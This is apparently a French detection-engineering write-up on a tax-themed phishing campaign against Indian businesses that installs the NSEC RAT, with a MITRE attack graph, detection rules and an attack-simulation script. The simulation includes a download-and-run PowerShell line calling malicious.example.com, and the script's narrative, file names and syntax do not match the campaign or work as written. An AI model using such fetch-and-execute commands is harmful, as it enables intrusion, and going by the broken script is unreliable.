Suivre
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Une opération de phishing imitant le département des impôts sur le revenu indien distribue un PDF piégé qui oriente les destinataires vers un portail de conformité contrefait. Le site incite les victimes à télécharger un fichier ZIP contenant un installateur NSIS signé, qui déploie ensuite un cheval de Troie d’accès à distance à plusieurs étapes. Le RAT persiste en créant un service Windows et communique avec plusieurs serveurs de commande et de contrôle via des ports non standards.
Investigation
Les chercheurs ont analysé l’appât PDF, l’URL intégrée et le flux de travail de l’installateur NSIS en chaîne. Ils ont documenté les binaires déposés sur le disque, la création d’un dossier d’installation caché, et l’enregistrement de NSecRTS.exe comme un service Windows. Le rapport capturait également les communications sortantes vers trois adresses IP et soulignait l’utilisation de charges signées tout au long de la chaîne de livraison.
Atténuation
Bloquer le domaine malveillant et les adresses IP associées à la périphérie et via les contrôles de proxy. Renforcer les protections des e-mails pour identifier les pièces jointes et liens sur le thème des impôts conduisant à des portails de conformité imités. Empêcher l’exécution automatique d’installateurs non fiables lorsque possible, et surveiller la création de services suspects — spécialement tout ce qui porte le nom Service de protection en temps réel de Windows.
Réponse
Alerter sur les noms de fichiers, hachages et activités d’enregistrement de service Windows liés à la chaîne d’infection. Isoler les points d’extrémité impactés, acquérir des images mémoire et disque, et effectuer un balayage médico-légal complet pour identifier d’autres étapes RAT ou outils. Supprimer les artéfacts de persistance et réinitialiser les identifiants potentiellement exposés pour empêcher toute nouvelle entrée.
graph TB %% Définitions des classes classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ffcc99 classDef file fill:#e6e6e6 %% Nœuds – Actions (Techniques MITRE) action_phishing_attachment[« <b>Action</b> – T1566.001 : <b>Pièce Jointe de Spearphishing</b><br/>Email contenant un PDF malveillant « Review Annexure.pdf » envoyé à la victime. »] class action_phishing_attachment action action_phishing_link[« <b>Action</b> – T1566.002 : <b>Lien de Spearphishing</b><br/>Le PDF contient un lien vers un faux portail de l’impôt sur le revenu (hxxps://www.akjys.top/). »] class action_phishing_link action action_user_execution[« <b>Action</b> – T1204.002 : <b>Exécution par l’Utilisateur</b><br/>La victime clique sur le lien, le fichier ZIP est téléchargé automatiquement et l’installateur est exécuté. »] class action_user_execution action action_code_signing[« <b>Action</b> – T1553.002 : <b>Signature de Code</b><br/>Installateurs NSIS signés avec des certificats d’apparence légitime. »] class action_code_signing action action_signed_binary_proxy[« <b>Action</b> – T1218 : <b>Exécution via Binaire Signé</b><br/>L’installateur NSIS signé lance la charge utile malveillante en contournant les contrôles de sécurité. »] class action_signed_binary_proxy action action_obfuscation[« <b>Action</b> – T1027.002 : <b>Emballage Logiciel</b><br/>Des wrappers NSIS multi-étapes chiffrent et dissimulent les binaires malveillants. »] class action_obfuscation action action_persistence_service_perm[« <b>Action</b> – T1574.010 : <b>Faiblesse des Autorisations des Fichiers de Service</b><br/>L’installateur modifie les autorisations des fichiers de service. »] class action_persistence_service_perm action action_persistence_service[« <b>Action</b> – T1569.002 : <b>Exécution de Service</b><br/>Enregistre NSecRTS.exe comme service Windows « Windows Real-time Protection Service ». »] class action_persistence_service action action_discovery_system[« <b>Action</b> – T1082 : <b>Découverte des Informations Système</b><br/>Le RAT collecte la version du système d’exploitation et les détails matériels. »] class action_discovery_system action action_discovery_software[« <b>Action</b> – T1518 : <b>Découverte des Logiciels</b><br/>Le RAT énumère les applications et services installés et stocke les données dans C:\\Program Files\\Common Files\\NSEC\\Data. »] class action_discovery_software action action_c2_web[« <b>Action</b> – T1071.001 : <b>Protocoles Web</b><br/>Communication C2 via HTTP/HTTPS. »] class action_c2_web action action_c2_nonstandard[« <b>Action</b> – T1571 : <b>Port Non Standard</b><br/>Utilisation des ports 48991, 48992 et 3898 pour le trafic C2. »] class action_c2_nonstandard action action_c2_bidirectional[« <b>Action</b> – T1102.002 : <b>Service Web Bidirectionnel</b><br/>Permet une communication bidirectionnelle avec le serveur. »] class action_c2_bidirectional action action_remote_access[« <b>Action</b> – T1219 : <b>Outils d’Accès à Distance</b><br/>L’attaquant exécute des commandes, exfiltre des données et maintient le contrôle. »] class action_remote_access action action_exfiltration_scheduled[« <b>Action</b> – T1029 : <b>Transfert Planifié</b><br/>Les données collectées sont envoyées périodiquement via POST au serveur C2. »] class action_exfiltration_scheduled action action_defense_evasion[« <b>Action</b> – T1070.004 : <b>Suppression de Fichiers</b><br/>Le chargeur supprime les fichiers déposés et les dossiers temporaires après l’exécution. »] class action_defense_evasion action action_multi_stage[« <b>Action</b> – T1104 : <b>Canaux Multi-Étapes</b><br/>Des installateurs successifs livrent la charge utile finale du RAT. »] class action_multi_stage action %% Nœuds – Outils / Fichiers / Malware tool_nsis_installer[« <b>Outil</b> – <b>Nom</b> : Installateur NSIS<br/><b>Description</b> : Installateur signé utilisé pour amorcer la charge utile. »] class tool_nsis_installer tool malware_rat[« <b>Malware</b> – <b>Nom</b> : NSEC RAT<br/><b>Description</b> : Cheval de Troie d’accès à distance offrant un contrôle complet du système. »] class malware_rat malware file_pdf[« <b>Fichier</b> – <b>Nom</b> : Review Annexure.pdf<br/><b>Type</b> : Pièce jointe PDF malveillante. »] class file_pdf file file_zip[« <b>Fichier</b> – <b>Nom</b> : Review Annexure.zip<br/><b>Type</b> : Archive contenant l’installateur NSIS. »] class file_zip file file_exe[« <b>Fichier</b> – <b>Nom</b> : NSecRTS.exe<br/><b>Type</b> : Exécutable de service enregistré sous Windows. »] class file_exe file %% Connexions – Flux d’Attaque action_phishing_attachment –>|contient| file_pdf file_pdf –>|redirige vers| action_phishing_link action_phishing_link –>|mène à| file_zip file_zip –>|exécuté par| action_user_execution action_user_execution –>|utilise| tool_nsis_installer tool_nsis_installer –>|signé avec| action_code_signing action_code_signing –>|permet| action_signed_binary_proxy action_signed_binary_proxy –>|obfusque via| action_obfuscation action_obfuscation –>|crée| malware_rat malware_rat –>|installé comme| action_persistence_service_perm action_persistence_service_perm –>|permet| action_persistence_service action_persistence_service –>|exécute| file_exe file_exe –>|collecte via| action_discovery_system file_exe –>|collecte via| action_discovery_software action_discovery_system –>|envoie des données à| action_c2_web action_discovery_software –>|envoie des données à| action_c2_web action_c2_web –>|utilise des ports| action_c2_nonstandard action_c2_web –>|utilise le canal| action_c2_bidirectional action_c2_bidirectional –>|fournit| action_remote_access action_remote_access –>|effectue| action_exfiltration_scheduled action_exfiltration_scheduled –>|déclenche| action_defense_evasion action_defense_evasion –>|précède| action_multi_stage %% Styles class tool_nsis_installer, file_pdf, file_zip, file_exe tool class malware_rat malware class action_* action
Flux d’attaque
Détections
Commandement et contrôle suspect par demande DNS de domaine de premier niveau (TLD) inhabituel (via DNS)
Voir
IOC (DestinationIP) à détecter : Campagne de phishing sur le thème de l’impôt indien visant les entreprises locales
Voir
IOC (SourceIP) à détecter : Campagne de phishing sur le thème de l’impôt indien visant les entreprises locales
Voir
IOC (HashMd5) à détecter : Campagne de phishing sur le thème de l’impôt indien visant les entreprises locales
Voir
Détection de l’exécution de malware dans une campagne de phishing sur le thème de l’impôt indien [Création de processus Windows]
Voir
Détection de la communication C2 de NSecRTS.exe [Connexion réseau Windows]
Voir
Exécution de Simulation
Prérequis : Le contrôle pré-vol de la télémétrie et de la base doit avoir été passé.
Rationale : Cette section détaille l’exécution précise de la technique d’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et visent à générer la télémétrie exacte attendue par la logique de détection.
-
Narratif & Commandes de l’attaque :
Un adversaire délivre un e-mail de phishing intitulé « Avis d’impôt sur le revenu ». La pièce jointe est un document Word malveillant qui déposesetup_Ir5swQ3EpeuBpePEpew=.exeto%TEMP%. La victime exécute le fichier, qui à son tour génèreSibuia.exe(la vraie charge utile) comme son enfant. Cette chaîne parent-enfant est conçue pour contourner les alertes génériques de création de processus mais est interceptée par la règle Sigma.Étapes effectuées sur l’hôte compromis :
- Déposez le binaire de première étape :
$stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1 - Exécuter le binaire de première étape :
Start-Process -FilePath $stage1 -NoNewWindow - Le binaire de première étape crée en interne le binaire de la deuxième étape
Sibuia.exedans le même répertoire et le lance : (Simulé par le script de test ci-dessous.)
- Déposez le binaire de première étape :
-
Script de Test de Régression :
Le script ci-dessous reproduit la relation exacte parent‑enfant requise pour déclencher la règle.# ------------------------------------------------- # Simulation de la chaîne de phishing sur les impôts indiens # ------------------------------------------------- # Définir les chemins $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" $stage2 = "$env:TEMPSibuia.exe" # Créer des binaires factices (zéro octet – suffisant pour la journalisation Sysmon) Set-Content -Path $stage1 -Value 'REM stage1 placeholder' -Encoding ASCII Set-Content -Path $stage2 -Value 'REM stage2 placeholder' -Encoding ASCII # S'assurer que les fichiers sont exécutables (Windows n'a pas besoin de chmod) Write-Host "[*] Lancement stage1..." $proc1 = Start-Process -FilePath $stage1 -PassThru # Donner un moment à stage1 pour « lancer » stage2 (simulé par lancement direct) Start-Sleep -Milliseconds 500 Write-Host "[*] Stage1 lance stage2 (Sibuia.exe)..." $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id Write-Host "[+] Simulation complète. Vérifiez la détection dans le SIEM." # ------------------------------------------------- -
Commandes de Nettoyage :
Supprimez les artéfacts et terminez tous les processus restants.# Arrêter tous les processus restants Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force # Supprimer les fichiers Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue Write-Host "[*] Nettoyage terminé."